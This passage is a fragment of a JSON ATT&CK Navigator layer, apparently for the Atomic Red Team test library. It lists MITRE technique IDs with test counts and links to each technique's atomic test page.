Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1187","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1195","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1195/T1195.md"}]},{"techniqueID":"T1197","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1201","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1202","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1204","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204/T1204.md"}]},{"techniqueID":"T1204.002","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"}]},{"techniqueID":"T1204.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.003/T1204.003.md"}]},{"techniqueID":"T1207","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1216","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}]},{"techniqueID":"T1216.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"}]},{"techniqueID":"T1217","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1218","score":78,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}]},{"techniqueID":"T1218.001","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"}]},{"techniqueID":"T1218.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"}]},{"techniqueID":"T1218.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"}]},{"techniqueID":"T1218.004","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"}]},{"techniqueID":"T1218.005","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"}]},{"techniqueID":"T1218.007","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"}]},{"techniqueID":"T1218.008","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"}]},{"techniqueID":"T1218.009","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"}]},{"techniqueID":"T1218.010","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"}]},{"techniqueID":"T1218.011","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"}]},{"techniqueID":"T1219","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1220","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1221","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1222","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222/T1222.md"}]},{"techniqueID":"T1222.001","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"}]},{"techniqueID":"T1222.002","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"}]},{"techniqueID":"T1482","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1484","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.001/T1484.001.md"}]},{"techniqueID":"T1484.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1485","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1489","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1490","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1491","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491/T1491.md"}]},{"techniqueID":"T1491.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"}]},{"techniqueID":"T1496","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"}]},{"techniqueID":"T1497","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497/T1497.md"}]},{"techniqueID":"T1497.001","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1505","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505/T1505.md"}]},{"techniqueID":"T1505.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"}]},{"techniqueID":"T1505.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"}]},{"techniqueID":"T1505.004","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.004/T1505.004.md"}]},{"techniqueID":"T1505.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.005/T1505.005.md"}]},{"techniqueID":"T1518","score":16,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1518.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1526","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1528","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1528/T1528.md"}]},{"techniqueID":"T1529","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1530","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1531","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1539","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1539/T1539.md"}]},{"techniqueID":"T1543","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543/T1543.md"}]},{"techniqueID":"T1543.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"}]},{"techniqueID":"T1543.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"}]},{"techniqueID":"T1543.003","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"}]},{"techniqueID":"T1543.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"}]},{"techniqueID":"T1546","score":39,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546/T1546.md"}]},{"techniqueID":"T1546.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"}]},{"techniqueID":"T1546.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"}]},{"techniqueID":"T1546.003","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"}]},{"techniqueID":"T1546.004","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"}]},{"techniqueID":"T1546.005","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"}]},{"techniqueID":"T1546.007","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"}]},{"techniqueID":"T1546.008","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"}]},{"techniqueID":"T1546.009","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.009/T1546.009.md"}]},{"techniqueID":"T1546.010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"}]},{"techniqueID":"T1546.011","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"}]},{"techniqueID":"T1546.012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"}]},{"techniqueID":"T1546.013","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"}]},{"techniqueID":"T1546.014","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"}]},{"techniqueID":"T1546.015","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.015/T1546.015.md"}]},{"techniqueID":"T1547","score":45,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}]},{"techniqueID":"T1547.001","score":17,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"}]},{"techniqueID":"T1547.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"}]},{"techniqueID":"T1547.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.003/T1547.003.md"}]},{"techniqueID":"T1547.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"}]},{"techniqueID":"T1547.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"}]},{"techniqueID":"T1547.006","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1547.007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"}]},{"techniqueID":"T1547.008","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.008/T1547.008.md"}]},{"techniqueID":"T1547.009","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"}]},{"techniqueID":"T1547.010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"}]},{"techniqueID":"T1547.012","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.012/T1547.012.md"}]},{"techniqueID":"T1547.014","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.014/T1547.014.md"}]},{"techniqueID":"T1547.015","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.015/T1547.015.md"}]},{"techniqueID":"T1548","score":42,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548/T1548.md"}]},{"techniqueID":"T1548.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"}]},{"techniqueID":"T1548.002","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"}]},{"techniqueID":"T1548.003","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"}]},{"techniqueID":"T1550","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550/T1550.md"}]},{"techniqueID":"T1550.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"}]},{"techniqueID":"T1550.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"}]},{"techniqueID":"T1552","score":38,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.001","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"}]},{"techniqueID":"T1552.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"}]},{"techniqueID":"T1552.004","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1552.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"}]},{"techniqueID":"T1552.007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1553","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553/T1553.md"}]},{"techniqueID":"T1553.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"}]},{"techniqueID":"T1553.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.003/T1553.003.md"}]},{"techniqueID":"T1553.004","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553.005","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1555","score":30,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1555.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"}]},{"techniqueID":"T1555.003","score":17,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555.004","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.004/T1555.004.md"}]},{"techniqueID":"T1556","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556/T1556.md"}]},{"techniqueID":"T1556.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1556.003","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.003/T1556.003.md"}]},{"techniqueID":"T1557","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557/T1557.md"}]},{"techniqueID":"T1557.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1558","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558/T1558.md"}]},{"techniqueID":"T1558.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.002/T1558.002.md"}]},{"techniqueID":"T1558.003","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559/T1559.md"}]},{"techniqueID":"T1559.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1560","score":15,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}]},{"techniqueID":"T1560.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"}]},{"techniqueID":"T1562","score":118,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.001","score":52,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.002","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.003","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1562.004","score":23,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.008","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1562.009","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.009/T1562.009.md"}]},{"techniqueID":"T1562.010","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.010/T1562.010.md"}]},{"techniqueID":"T1563","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563/T1563.md"}]},{"techniqueID":"T1563.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1564","score":28,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1564.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1564.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.006/T1564.006.md"}]},{"techniqueID":"T1566","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566/T1566.md"}]},{"techniqueID":"T1566.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1567","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1567.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.002/T1567.002.md"}]},{"techniqueID":"T1567.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.003/T1567.003.md"}]},{"techniqueID":"T1569","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569/T1569.md"}]},{"techniqueID":"T1569.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"}]},{"techniqueID":"T1569.002","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1570","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1570/T1570.md"}]},{"techniqueID":"T1571","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574/T1574.md"}]},{"techniqueID":"T1574.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"}]},{"techniqueID":"T1574.008","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.008/T1574.008.md"}]},{"techniqueID":"T1574.009","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1580","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1580/T1580.md"}]},{"techniqueID":"T1592","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592/T1592.md"}]},{"techniqueID":"T1592.001","score":1,"enabled":true,"links":[{"label":"View 